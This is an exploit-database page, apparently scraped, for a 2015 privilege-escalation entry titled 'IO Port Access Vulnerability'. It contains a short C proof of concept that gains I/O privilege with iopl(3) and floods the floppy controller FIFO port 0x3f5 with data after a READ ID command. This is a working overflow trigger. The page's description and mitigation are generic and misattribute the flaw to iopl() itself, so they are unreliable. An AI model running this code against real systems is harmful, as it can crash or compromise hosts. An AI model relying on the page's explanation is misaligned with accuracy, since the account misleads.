header-logo
Suggest Exploit
vendor:
N/A
by:
Marc Deslauriers
8.8
CVSS
HIGH
Privilege Escalation
264
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2015

IO Port Access Vulnerability

This vulnerability allows an attacker to gain access to the I/O ports of a system, which can be used to gain access to privileged information or to execute malicious code. The vulnerability is caused by the use of the iopl() function in the code, which allows an attacker to gain access to the I/O ports of a system. The code also contains a loop that can be used to push data into the FIFO register, which can be used to gain access to privileged information or to execute malicious code.

Mitigation:

The best way to mitigate this vulnerability is to ensure that the iopl() function is not used in any code that is running on the system.
Source

Exploit-DB raw data:

// Source: https://marc.info/?l=oss-security&m=143155206320935&w=2

#include <sys/io.h>

#define FIFO 0x3f5

int main() {
        int i;
        iopl(3);

        outb(0x0a,0x3f5); /* READ ID */
        for (i=0;i<10000000;i++)
                outb(0x42,0x3f5); /* push */
}

Navigation

Suggest Exploit

Services By CQR